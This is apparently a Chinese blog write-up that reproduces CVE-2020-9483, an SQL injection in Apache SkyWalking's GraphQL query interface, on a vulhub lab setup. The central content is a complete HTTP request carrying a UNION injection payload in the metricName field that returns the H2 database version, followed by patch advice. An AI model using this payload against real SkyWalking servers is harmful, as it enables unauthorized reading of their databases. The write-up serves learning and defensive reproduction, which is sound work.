(CVE-2020-9483)ApacheSkyWalking SQL注入 漏洞复现

漏洞信息

漏洞名称
ApacheSkyWalking SQL注入漏洞
漏洞编号
CVE-2020-9483
危害等级
高危
漏洞类型
通用型漏洞
漏洞厂商
Apache
漏洞概述
当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

先在kali安装docker-compose
在这里插入图片描述然后下载靶场vulhub:
在这里插入图片描述docker-compose up -d
生成靶场环境:
在这里插入图片描述访问8080端口:

在这里插入图片描述环境搭建完成。

漏洞复现

利用burpsuite抓包:
在这里插入图片描述BP抓包,利用报错注入获取版本

POST /graphql HTTP/1.1
Host: 192.168.18.149:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 610
Origin: http://192.168.18.149:8080
Connection: close
Referer: http://192.168.18.149:8080/
{
    "query":"query queryLogs($condition: LogQueryCondition) {
  queryLogs(condition: $condition) {
    total
    logs {
      serviceId
      serviceName
      isError
      content
    }
  }
}
",
    "variables":{
        "condition":{
            "metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --",
                        "endpointId":"1",
                    "traceId":"1",
                    "state":"ALL",
                    "stateCode":"1",
            "paging":{
                "pageSize":10
            }
        }
    }
}

在这里插入图片描述成功返回h2数据库版本信息!

修复建议

1、升级Apache Skywalking 到最新的 v8.4.0 版本。
2、将默认h2数据库替换为其它支持的数据库。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>